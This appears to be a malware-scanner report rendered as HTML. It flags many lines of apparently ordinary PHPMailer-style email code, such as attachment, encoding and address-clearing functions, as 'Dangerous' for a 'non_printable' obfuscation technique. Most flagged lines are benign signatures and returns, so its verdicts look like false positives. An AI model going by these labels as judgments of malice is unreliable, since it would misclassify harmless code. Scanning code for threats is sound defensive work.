<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
